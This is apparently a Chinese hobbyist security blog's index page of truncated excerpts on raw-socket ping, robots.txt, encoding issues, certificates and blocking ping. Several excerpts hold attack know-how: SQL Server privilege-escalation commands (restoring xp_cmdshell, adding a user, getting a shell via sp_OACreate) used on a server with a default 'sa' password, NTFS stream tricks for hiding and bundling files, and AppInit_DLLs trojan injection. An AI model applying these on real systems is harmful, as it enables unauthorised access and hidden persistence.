最近在学习TCP/IP协议。在以前套接字基础上又学习了原始套接字的使用。并喜欢上了这个东西-因为它功能太强大了。 下面是我用原始套接字实现的Ping.exe命令这是运行后的效果（嘿嘿，还真相Ping程序,哈哈） //Ping模拟 By RedIce//E-mail:redice@see.xidian.edu.cn//http://redice.1.suhai.com.cn#include <winsock2.h> //Winsock API头文件#include <stdio.h>#include <stdlib.h>#pragma comment(lib,"ws2_32.lib"...

昨日行幸得一Sa密码为Sa的Sql Server服务器。于是决定提权...... 下面是我用到的提权命令，放在这里以备将来只用. 一 系统Shell 恢复xp_cmdshellExec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' 使用xp_cmdshell添加用户exec xp_cmdshell 'net user user1 /add' 利用OLE对象接口，SQL SERVER提供了一些函数访问OLE对象，分别是sp_OACREATE和sp_OAMethod,可以利用他们调用OLE控件，间接获取一个shell...

今天在论坛看到一位朋友说他的QQ登录号码输入框没见了，并且发上来了一个截图。其实，要实现这也不能。想起以前学习API时用到过一个函数叫ShowWindow。函数声明为： Declare Function ShowWindow Lib "user32" Alias "ShowWindow" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long 第一个参数hwnd是一个窗口句柄（广义的窗口包括控件），第二个参数取不同的值可以实现不同的效果。其中当它为0时，就可以用来隐藏一个窗体，取5时可以显示一个窗口。 我做了如下的模拟：打开QQ.e...

　　乱码其实并不是什么问题，asp/php/jsp都有。我想所有转换编码的地方都会碰到。一般来说从头到尾始终使用同一种编码方式就 不会有乱码。数据库使用的GBK编码，页面就也指定使用GBK编码。同样，数据库使用unicode编码，页面就请使用utf-8编码。如果出 现乱码，肯定有地方使用了错误的编码格式。用asp举例，如果你发现浏览页面的时候出现乱码。你可以尝试一下步骤：确保你页面本身编码格式正确：例如test.asp中使用charset=utf-8，那么请先确保这个文件本身就是Utf-8编码的。你可以利用记事 本进行转换。同样如果使用charset=GBK，请先确保这个文件本...

什么是robots.txt文件? 搜索引擎通过一种程序robot（又称spider），自动访问互联网上的网页并获取网页信息。 您可以在您的网站中创建一个纯文本文件robots.txt，在这个文件中声明该网站中不想被robot访问的部分，这样，该网站的部分或全部内容就可以不被搜索引擎收录了，或者指定搜索引擎只收录指定的内容。 robots.txt文件放在哪里? robots.txt文件应该放在网站根目录下。举例来说，当robots访问一个网站（比如http://www.abc.com）时，首先会检查该网站中是否存在http://www.abc.com/robots.txt这个文件，如果机...

什么是robots.txt文件? 搜索引擎通过一种程序robot（又称spider），自动访问互联网上的网页并获取网页信息。 您可以在您的网站中创建一个纯文本文件robots.txt，在这个文件中声明该网站中不想被robot访问的部分，这样，该网站的部分或全部内容就可以不被搜索引擎收录了，或者指定搜索引擎只收录指定的内容。 robots.txt文件放在哪里? robots.txt文件应该放在网站根目录下。举例来说，当robots访问一个网站（比如http://www.abc.com）时，首先会检查该网站中是否存在http://www.abc.com/robots.txt这个文件，如果机...

NTFS文件流的利用 一 隐藏信息 在任一NTFS 分区下打开CMD，执行命令“echo abcde>>a.txt:b.txt” 则在当前目录下生成一个名为a.txt的文件。但文件的大小 为0。用记事本打开也没有任何内容。只有当我们执行notepad.exe a.txt:b.txt才能看到刚才写入的"abcde" 二 隐藏文件 命令格式为: type 文件名+后缀>>任意文件名(任意后缀):任意文件名(原文件后缀) 打开文件时如果打开文件的程序不是系统自带的则要加上文件完整的路径。三 捆绑可执行文件 捆绑命令和上面的一样，打开的时候需要用命令：start 流文件路径...

1 备份IP配置信息 命令格式：netsh -c interface ip dump >c:\ip.txt2 导入以前备份的信息 命令格式：netsh -f c:\ip.txt

什么是数字证书？ 由于Internet网电子商务系统技术使在网上购物的顾客能够极其方便轻松地获得商家和企业的信息,但同时也增加了对某些敏感或有价值的数据被滥用的风险. 为了保证互联网上电子交易及支付的安全性,保密性等，防范交易及支付过程中的欺诈行为，必须在网上建立一种信任机制。这就要求参加电子商务的买方和卖方都必须拥有合法的身份，并且在网上能够有效无误的被进行验证。数字证书是一种权威性的电子文档。它提供了一种在Internet上验证您身份的方式，其作用类似于司机的驾驶执照或日常生活中的身份证。它是由一个由权威机构----CA证书授权(Certificate Authority)中心发...

注册表的系统设置项“AppInit_DLLs”可以为任一个进程调用一个dll列表，是早期的进程插入式木马的伎俩，通过修改注册表中的 [HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Windows\AppInit_DLLs] 来达到插入进程的目的。缺点:修改注册表后需要重新启动才能完成进程插入。 AppInit_DLLs这个项目，正常情况下它的值应该是空的。这个项目表示每当一个程序启动的时候，AppInit_DLLs中的dll文件就会注入到该程序里面去启动。举个例子：如果AppI...

我们可以自己通过操作来防止别人来Ping我们的电脑。具体的步骤如下： 　　1、添加独立管理单元 　　依次单击开始-运行，输入:mmc，启动打开“控制台”窗口。再点选“控制台”菜单下的“添加/删除管理单元”，单击“添加” 按钮，在弹出的窗口中选择“IP安全策略管理”项，单击“添加”按钮。在打开窗口中选择管理对象为“本地计算机”，单击“完成 ”按钮，同时关闭“添加/删除管理单元”窗口，返回主控台。 　　2、创建IP安全策略 　　在主控台中右击刚刚添加的“IP安全策略，选择“创建IP安全策略”，单击“下一步”，然后输入一个策略描述，如“ping go” 。单击“下一步”，...